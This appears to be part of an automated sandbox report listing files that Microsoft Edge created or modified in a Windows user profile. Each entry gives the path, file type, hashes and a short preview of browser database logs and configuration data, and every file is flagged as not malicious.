                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):315
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.310432098978474
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R8fVuDd1cNwi23oH+Tcwtp3hBtB2KLlp8R8xBAQ+q2PcNwi23oH+Tcwtp3hBWq:7VfVuDjZYebp3dFLTVx2VvLZYebp3eF2
                                                                                                                                                                                                                                                                                          MD5:8C5E2F1CE99B0CD7E2454D8C1329E549
                                                                                                                                                                                                                                                                                          SHA1:099A24CF3FDDBE9CB18D7A88820C98E460C06722
                                                                                                                                                                                                                                                                                          SHA-256:341D1377FAA680C9D3E5EC1A71F5B69E7D30A651A9B89ED58D75CEB9DFB8465B
                                                                                                                                                                                                                                                                                          SHA-512:CA7A74442329E2D9444040516A27502BE09326144AD4EC433ECDEB0C4790460DC9B90BBE2B1C1407B48BD73BE71B08BE011138D2632DABC5AA9ECA4619791482
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:57.660 1f48 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/19-03:45:57.719 1f48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):1696115
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.040615305831622
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:kxf76gGkISshcFdmcOAoPENUpifYP+MbI2T:kxfgAmmE
                                                                                                                                                                                                                                                                                          MD5:38B4AE4C66FCDA8C533D832A7517E662
                                                                                                                                                                                                                                                                                          SHA1:C138FDD93B771E2A6925BB60D5D11B7546717943
                                                                                                                                                                                                                                                                                          SHA-256:2BFD166FF453208AD6BE9C6CEDF43759AEE304BC33D6CA2FB2B1CA2FF0A97F33
                                                                                                                                                                                                                                                                                          SHA-512:C1DA1CC608BCF83D6F8C08536E2B70255A721C6AE55DD4650D2A500AAA534970CA811983E7B7611220058B5903BA45A47A9405B2DB23BC0FCA408ADEE1087B3F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.21196388110826
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R86xpM+q2PcNwi23oH+Tcwt9Eh1tIFUt8O8R84Zmw+O8R8uMMVkwOcNwi23oH/:7VAM+vLZYeb9Eh16FUt8OV4/+OVuMMVr
                                                                                                                                                                                                                                                                                          MD5:64C5E75E0ECD224ADF24A10C8E623B1B
                                                                                                                                                                                                                                                                                          SHA1:69CC18120BFD9EC1A6569D1A313D070FA01854A1
                                                                                                                                                                                                                                                                                          SHA-256:2AA8AB98AEAFDCC841BD293C928E4BD87863DAFFE0C9016156D6A4A219129AFB
                                                                                                                                                                                                                                                                                          SHA-512:3CD75DF2B6F2131E9A4CBEF0A27EC7819A6935A41CDF8E3ED25F808A2321B9F85983F9FDB10E70E1ACDCA9907A380951DF9C03F0775BA418D2FFD8D5FE3538E4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:57.546 b6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/19-03:45:57.547 b6c Recovering log #3.2024/12/19-03:45:57.552 b6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.21196388110826
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R86xpM+q2PcNwi23oH+Tcwt9Eh1tIFUt8O8R84Zmw+O8R8uMMVkwOcNwi23oH/:7VAM+vLZYeb9Eh16FUt8OV4/+OVuMMVr
                                                                                                                                                                                                                                                                                          MD5:64C5E75E0ECD224ADF24A10C8E623B1B
                                                                                                                                                                                                                                                                                          SHA1:69CC18120BFD9EC1A6569D1A313D070FA01854A1
                                                                                                                                                                                                                                                                                          SHA-256:2AA8AB98AEAFDCC841BD293C928E4BD87863DAFFE0C9016156D6A4A219129AFB
                                                                                                                                                                                                                                                                                          SHA-512:3CD75DF2B6F2131E9A4CBEF0A27EC7819A6935A41CDF8E3ED25F808A2321B9F85983F9FDB10E70E1ACDCA9907A380951DF9C03F0775BA418D2FFD8D5FE3538E4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:57.546 b6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/19-03:45:57.547 b6c Recovering log #3.2024/12/19-03:45:57.552 b6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4628110979398677
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuF:TouQq3qh7z3bY2LNW9WMcUvBuF
                                                                                                                                                                                                                                                                                          MD5:94FA0E6FD30A29F0193F22C1DA6F0319
                                                                                                                                                                                                                                                                                          SHA1:1E3D605D4866BABE5099B347FEC8FD36AE46B119
                                                                                                                                                                                                                                                                                          SHA-256:E6008ADB2D56832634DDE1CE1566FB7D89C551859AF4BC3AB2485E91DE588410
                                                                                                                                                                                                                                                                                          SHA-512:40D4753C3F6EB1FF9C960B8BCED182126436143033555665FC8F4120C00ABCFCADB545484FD1DA979DBAE78110817CC4A9DD93C9F00E812964F192A09F9DD2B3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                          MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                          SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                          SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                          SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):354
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.268748388287436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R4b+q2PcNwi23oH+TcwtnG2tMsIFUt8O8R4LZmw+O8ROubVkwOcNwi23oH+Tci:7GvLZYebn9GFUt8O//+OFuB54ZYebn9b
                                                                                                                                                                                                                                                                                          MD5:1C7F780861226B415D32C0E98F76156A
                                                                                                                                                                                                                                                                                          SHA1:597F50C64A2C5D03D262684FEB4AD8B00EAA88CA
                                                                                                                                                                                                                                                                                          SHA-256:A6DE6BEEB6AC59E35225F855CE8162A959AA77EEBA06A45A57B60E62E9424FA0
                                                                                                                                                                                                                                                                                          SHA-512:101BC652BD64FBBD73B8456B21DCE75879A198E5BAD1280E9CE57E6E3FBE4BBEA195830410169C55A2FC20D3E36ED4623801ED96BC81F123B143F4BAAEC30105
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.747 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/19-03:45:52.747 19e8 Recovering log #3.2024/12/19-03:45:52.748 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):354
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.268748388287436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R4b+q2PcNwi23oH+TcwtnG2tMsIFUt8O8R4LZmw+O8ROubVkwOcNwi23oH+Tci:7GvLZYebn9GFUt8O//+OFuB54ZYebn9b
                                                                                                                                                                                                                                                                                          MD5:1C7F780861226B415D32C0E98F76156A
                                                                                                                                                                                                                                                                                          SHA1:597F50C64A2C5D03D262684FEB4AD8B00EAA88CA
                                                                                                                                                                                                                                                                                          SHA-256:A6DE6BEEB6AC59E35225F855CE8162A959AA77EEBA06A45A57B60E62E9424FA0
                                                                                                                                                                                                                                                                                          SHA-512:101BC652BD64FBBD73B8456B21DCE75879A198E5BAD1280E9CE57E6E3FBE4BBEA195830410169C55A2FC20D3E36ED4623801ED96BC81F123B143F4BAAEC30105
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.747 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/19-03:45:52.747 19e8 Recovering log #3.2024/12/19-03:45:52.748 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6122324130406155
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWbryMAqZxiJ:TLapR+DDNzWjJ0npnyXKUO8+jUep+xmL
                                                                                                                                                                                                                                                                                          MD5:556670A3B0C3043B4E277F864F6926B1
                                                                                                                                                                                                                                                                                          SHA1:1CBC04FDBDBBAB9217CF50FBF3AA4599CAA0492E
                                                                                                                                                                                                                                                                                          SHA-256:51E6405E3C28B37E1A62C7C144B99E2CEE88DE49709800D58D7E6D0E2A779106
                                                                                                                                                                                                                                                                                          SHA-512:D6D03C92692F917842CE5FBEE614AD20F6D6D153DB61758B26429F303F6B61140C7F6CF91E64A5407494D78D46A99894DA42EB77033867F5D02D9B75168E7082
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):375520
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.354135798592761
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:QA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:QFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                          MD5:5E2E099484F0BF6DF3DEEC6007C3F149
                                                                                                                                                                                                                                                                                          SHA1:6908253BDEBE0735BBEC135F3702D98506E35BF5
                                                                                                                                                                                                                                                                                          SHA-256:04D78ED23077137640C0785B2CA6B8D8C348F4755B60ACD7F65EC3557B278045
                                                                                                                                                                                                                                                                                          SHA-512:D640385E9CE9100AE15BD513130D10DDF732E8F8AC1D6F8A51DEE9CBD425FFBFE822248974EC057E41A0412F31E174C33391F1B58A3A831791FB7D739DA47C2A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1N...q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379071560310863..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):315
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1955463292093755
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R8ZM1cNwi23oH+Tcwtk2WwnvB2KLlp8R8g4q2PcNwi23oH+Tcwtk2WwnvIFUv:7VZ2ZYebkxwnvFLTVg4vLZYebkxwnQF2
                                                                                                                                                                                                                                                                                          MD5:59901CA327311C296BE3BFF02B52073C
                                                                                                                                                                                                                                                                                          SHA1:4D2697215A1FF8B696A0605D04F1C88C18A5DAC0
                                                                                                                                                                                                                                                                                          SHA-256:C3E4B5A1B36540EE2E66B97EB5E60353E0C5D6BE11D3A5C048F7DB67B797630F
                                                                                                                                                                                                                                                                                          SHA-512:5EA3CC667D7611B7629CE683704C21DE7B5BDE500FF036D4140FCC5838769957A2414D7E8C4C8F532F4E0BF572486A31B194AEB4FDE678AB1FC04013CE441924
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:57.545 da4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/19-03:45:57.578 da4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):358860
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324612539973726
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R0:C1gAg1zfvM
                                                                                                                                                                                                                                                                                          MD5:7FFC78D822CEC087D37DFCE8794B14BD
                                                                                                                                                                                                                                                                                          SHA1:9A654E28E4FEC644949CD57C03328CE24D1D1ED1
                                                                                                                                                                                                                                                                                          SHA-256:D4B0F08FF1BC0EF6D186DDC6F0FDE2DA24AF075ADF80356FCDE379A8F7E48E6A
                                                                                                                                                                                                                                                                                          SHA-512:69FED68B9744CBBED2DCFD30D4FE709890BB1BF4535BB5E4FDF34B7F0C41447F42E751F3A1B99D67B425DF4C74B28A5F9E5EC14F5D41489478E228E3E49B1385
                                                                                                                                                                                                                                                                                          Malicious:false
